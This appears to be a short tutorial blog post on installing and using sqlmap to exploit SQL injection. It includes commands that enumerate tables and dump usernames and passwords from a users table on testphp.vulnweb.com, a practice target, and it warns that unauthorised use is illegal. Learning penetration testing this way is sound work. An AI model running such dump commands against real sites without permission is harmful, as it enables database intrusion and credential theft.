Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
To install SQLmap we can pull it from above github link or we can use below command
- apt-get install sqlmap
It comes installed by default in kali linux...
To use sqlmap to exploit SQLi flaw
1. First we need to find a SQLi vulnerable parameter in a web app
Addind a single quote showed this site parameter cat is vulnerable
2. We can launch sqlmap to dump Databases, tables and cloumns and Data from the vulnerable site
Note: Using Sqlmap for exploitation without proper permission is illegal
-u url -p parameter
--tables to get tables
--columns to get columns
Sqlmap may take a lot of time as it will try lot of sqli techniques based on target SQL server (mysql, mssql, oracle etc.,)
Once we got DB, we can fetch tables and columns
- sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 -p cat -D acuart --tables
Lets dump user and pass info from users table
- sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 -p cat -D acuart -T users -C uname,pass --dump
In this way SQLmap can be used to exploit blind SQLi vulnerability also..